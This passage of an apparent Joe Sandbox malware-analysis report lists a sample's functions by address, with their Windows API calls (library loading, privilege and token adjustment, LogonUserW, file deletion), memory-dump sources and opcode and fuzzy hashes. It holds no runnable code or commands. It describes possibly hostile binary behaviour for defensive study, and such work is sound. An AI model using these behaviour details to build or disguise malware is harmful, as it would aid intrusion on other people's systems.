                                                                                                                                                                        • API String ID: 2358735015-0
                                                                                                                                                                        • Opcode ID: ffde10ca3bc7a9ef85674bbaa1480663bb2e0132fe6e2feb14d26b237e070762
                                                                                                                                                                        • Instruction ID: 1d052fd2aa72f9194c93ce469e4a43e8c21db72158dfa4eb0337caa5b99c13bf
                                                                                                                                                                        • Opcode Fuzzy Hash: ffde10ca3bc7a9ef85674bbaa1480663bb2e0132fe6e2feb14d26b237e070762
                                                                                                                                                                        • Instruction Fuzzy Hash: 6441287661020AAFCB51EF68C880EAEB3B9EF44310B21863EE507D7250EB70DE54CB50
                                                                                                                                                                        Function 00266679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0026668B,?,?,002662FA,?,00000001,?,?,00000000), ref: 0026664A
                                                                                                                                                                          • Part of subcall function 0026663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0026665C
                                                                                                                                                                          • Part of subcall function 0026663E: FreeLibrary.KERNEL32(00000000,?,?,0026668B,?,?,002662FA,?,00000001,?,?,00000000), ref: 0026666E
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002662FA,?,00000001,?,?,00000000), ref: 002666AB
                                                                                                                                                                          • Part of subcall function 00266607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,002A5657,?,?,002662FA,?,00000001,?,?,00000000), ref: 00266610
                                                                                                                                                                          • Part of subcall function 00266607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00266622
                                                                                                                                                                          • Part of subcall function 00266607: FreeLibrary.KERNEL32(00000000,?,?,002A5657,?,?,002662FA,?,00000001,?,?,00000000), ref: 00266635
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2632591731-0
                                                                                                                                                                        • Opcode ID: 093611a54231154f3f68a2de8b6b81000272da6a262270fbd09743291301a8e0
                                                                                                                                                                        • Instruction ID: 9938881817abf5c6e132b728b31155c3371fa320130260a6e20772835ba9f974
                                                                                                                                                                        • Opcode Fuzzy Hash: 093611a54231154f3f68a2de8b6b81000272da6a262270fbd09743291301a8e0
                                                                                                                                                                        • Instruction Fuzzy Hash: 1C112731620205ABCF10BF70D90ABAD77A99F40710F10442DF442A71C2DEB5DAA4DF90
                                                                                                                                                                        Function 00298782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __wsopen_s
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3347428461-0
                                                                                                                                                                        • Opcode ID: e663b186c268a8d6b84ff266e67313f479e4507528519287708f2b5bcb5dca97
                                                                                                                                                                        • Instruction ID: 204c3616e1493832eb46cbe60852251da0107cedad74ce0fd5e1bb9432b96d47
                                                                                                                                                                        • Opcode Fuzzy Hash: e663b186c268a8d6b84ff266e67313f479e4507528519287708f2b5bcb5dca97
                                                                                                                                                                        • Instruction Fuzzy Hash: 5011487690410AAFCF05DF98E940DDA7BF8EF49300F154069F809AB311DA31EA218B64
                                                                                                                                                                        Function 0028E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                        • Instruction ID: 0f1b123d023b746b3de07911e8ff54e0f221ef92cbece801b3ee720e68946e6b
                                                                                                                                                                        • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                        • Instruction Fuzzy Hash: C2F02D3A53262096DE313A36DC01B6A33988F43334F150716F525931D1EBF4F8258BD2
                                                                                                                                                                        Function 002DF94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 002DF987
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnvironmentVariable
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1431749950-0
                                                                                                                                                                        • Opcode ID: b71db7080cdb8f117ddbab18a0b947ada67b1388902df1efbd986258a06c80e7
                                                                                                                                                                        • Instruction ID: cc8590c20cb538f871028da7a64e47c48fdf8d81285dc43a9ba3d1df51a643b5
                                                                                                                                                                        • Opcode Fuzzy Hash: b71db7080cdb8f117ddbab18a0b947ada67b1388902df1efbd986258a06c80e7
                                                                                                                                                                        • Instruction Fuzzy Hash: 02F08176610104BFCB01FBA5DC8AD9E77B8EF45720F000055F9059B361DA70ED54CB50
                                                                                                                                                                        Function 00294FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0029319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00295031
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                        • Opcode ID: 83d1d1c9bea70b495d576321506727bd8a103ede7ed9fe8201f32142faea3457
                                                                                                                                                                        • Instruction ID: 0b96c97464165ba33d131ad017a92d13f6471d25dd8beba54d2c96d851abcb0c
                                                                                                                                                                        • Opcode Fuzzy Hash: 83d1d1c9bea70b495d576321506727bd8a103ede7ed9fe8201f32142faea3457
                                                                                                                                                                        • Instruction Fuzzy Hash: 4EF0B436775E35A6DF333F269C05B6B3748AF457F0F148121B81897090EA70D8218BE0
                                                                                                                                                                        Function 00293B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00286A79,?,0000015D,?,?,?,?,002885B0,000000FF,00000000,?,?), ref: 00293BC5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                        • Opcode ID: e67a55b698f4d2c64db298dbda2a9bcfb7b9c353197ea086a47cdac3827b4fee
                                                                                                                                                                        • Instruction ID: 415ca200e101ef52a70015c637403f0a7617294703e48fa4659c2e8fa78ad26c
                                                                                                                                                                        • Opcode Fuzzy Hash: e67a55b698f4d2c64db298dbda2a9bcfb7b9c353197ea086a47cdac3827b4fee
                                                                                                                                                                        • Instruction Fuzzy Hash: 44E02B35271632A6DF21BE729C11B9B365C9F013B4F150160FC29D60D0DF70CD2086E0
                                                                                                                                                                        Function 002666E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 602b47e9880098859aa858fc69b92ba6cac40368da69d7032d97fc655e956770
                                                                                                                                                                        • Instruction ID: e6b50eadc97ba84602d07d659ec7fe4ccecf1b92d6796b927e8a8eb910b6e08f
                                                                                                                                                                        • Opcode Fuzzy Hash: 602b47e9880098859aa858fc69b92ba6cac40368da69d7032d97fc655e956770
                                                                                                                                                                        • Instruction Fuzzy Hash: 51F030B1125752CFCB349F64D4A4816B7F5FF14329314893EE1D686510C7719890DF10
                                                                                                                                                                        Function 0026684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __fread_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2638373210-0
                                                                                                                                                                        • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                        • Instruction ID: 45b6eba6b13d9f1e13613dd6d4c7ee1aca69d2fc847f49a2d3baf01f26994d58
                                                                                                                                                                        • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                        • Instruction Fuzzy Hash: E9F0587541020DFFDF04DF90C941EAEBBB9FB04308F208045F9149A151C336EA21ABA0
                                                                                                                                                                        Function 00263907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00263963
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: IconNotifyShell_
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1144537725-0
                                                                                                                                                                        • Opcode ID: bbe38c58a7ec9e8ada79ade73527e8ba0384d88fe934b5174227d7208a2497db
                                                                                                                                                                        • Instruction ID: 0b0c674fd826c50ffd88e19e7fa28c262f1acebd797b8cfb617162d310f7c6cf
                                                                                                                                                                        • Opcode Fuzzy Hash: bbe38c58a7ec9e8ada79ade73527e8ba0384d88fe934b5174227d7208a2497db
                                                                                                                                                                        • Instruction Fuzzy Hash: 47F037749143549FE753DF24EC897967BFCA701718F0000A5A644A7181D7745798CF51
                                                                                                                                                                        Function 00263A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00263A76
                                                                                                                                                                          • Part of subcall function 00268577: _wcslen.LIBCMT ref: 0026858A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LongNamePath_wcslen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 541455249-0
                                                                                                                                                                        • Opcode ID: f569e2c9825e9b80048c2326cd3892a8b69977d348c31abf1a92d9d774c8eeb9
                                                                                                                                                                        • Instruction ID: 624482ddbdb0bf6d8ac7ea61cf12a62f04800c8e2c8f9427081cc01e33cea6e4
                                                                                                                                                                        • Opcode Fuzzy Hash: f569e2c9825e9b80048c2326cd3892a8b69977d348c31abf1a92d9d774c8eeb9
                                                                                                                                                                        • Instruction Fuzzy Hash: 3EE08C72A002245BCB20A258AC0AFEA77ADDF887A0F4541B1BC09D7258D960AD808A90
                                                                                                                                                                        Function 002A071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,00000000,?,002A0A84,?,?,00000000,?,002A0A84,00000000,0000000C), ref: 002A0737
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: 325e11b04b1e23dcbaba2f01ad892b8d41aaa91ee76c128ec9d4eeb8aa02ef1d
                                                                                                                                                                        • Instruction ID: dc59afcf65981b639c1fd3a6df5563122fda15d30ba1b2f47af56ee0b96137cf
                                                                                                                                                                        • Opcode Fuzzy Hash: 325e11b04b1e23dcbaba2f01ad892b8d41aaa91ee76c128ec9d4eeb8aa02ef1d
                                                                                                                                                                        • Instruction Fuzzy Hash: 7ED06C3200010DBBDF028F84ED06EDA3BAAFB48754F014010BE1856020C732E831EB90
                                                                                                                                                                        Function 002CEAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?,002CD840), ref: 002CEAB1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                        • Opcode ID: cc73d10a65e599d7b478ae077a1e8c571e74f37041776a62d2a670b8552ce7f5
                                                                                                                                                                        • Instruction ID: fc5632999ac5efbdc5306b14cc17bdc4656c2391e1d7ea98945608ca62af819f
                                                                                                                                                                        • Opcode Fuzzy Hash: cc73d10a65e599d7b478ae077a1e8c571e74f37041776a62d2a670b8552ce7f5
                                                                                                                                                                        • Instruction Fuzzy Hash: 6DB09224020A0109AD280F386A0DEA9330178427F57DE1BC8E879850E6C33A882FE990
                                                                                                                                                                        Function 002D664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002CDC54: FindFirstFileW.KERNEL32(?,?), ref: 002CDCCB
                                                                                                                                                                          • Part of subcall function 002CDC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 002CDD1B
                                                                                                                                                                          • Part of subcall function 002CDC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 002CDD2C
                                                                                                                                                                          • Part of subcall function 002CDC54: FindClose.KERNEL32(00000000), ref: 002CDD43
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002D666E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2191629493-0
                                                                                                                                                                        • Opcode ID: 103d644f647a9f7b20795bf785a38719752b3365b1255921dce95981d3fdbb1f
                                                                                                                                                                        • Instruction ID: dbb82004416acbdb672a924c80f4140ba1c7b8f28fed1f20d3119c4dd0d01349
                                                                                                                                                                        • Opcode Fuzzy Hash: 103d644f647a9f7b20795bf785a38719752b3365b1255921dce95981d3fdbb1f
                                                                                                                                                                        • Instruction Fuzzy Hash: 56F08C362202008FCB14EF58D855B6EB7E9AF88360F04845AF9098B352CB74BC51CF90

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        Function 002C1B4D Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002C2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002C205A
                                                                                                                                                                          • Part of subcall function 002C2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002C2087
                                                                                                                                                                          • Part of subcall function 002C2010: GetLastError.KERNEL32 ref: 002C2097
                                                                                                                                                                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 002C1BD2
                                                                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 002C1BF4
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 002C1C05
                                                                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002C1C1D
                                                                                                                                                                        • GetProcessWindowStation.USER32 ref: 002C1C36
                                                                                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 002C1C40
                                                                                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002C1C5C
                                                                                                                                                                          • Part of subcall function 002C1A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002C1B48), ref: 002C1A20
                                                                                                                                                                          • Part of subcall function 002C1A0B: CloseHandle.KERNEL32(?,?,002C1B48), ref: 002C1A35
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                        • String ID: $default$winsta0$j2
                                                                                                                                                                        • API String ID: 22674027-3831197935
                                                                                                                                                                        • Opcode ID: 2a521ca8885ecc5b9376aa77a1fc4a6f434d3e8a99dbf66679c91ae0dbfdce4b
                                                                                                                                                                        • Instruction ID: d97f9ddd2af2ace714244c0fac2c7198d33f4c16f8712d96703645ec41e355f0
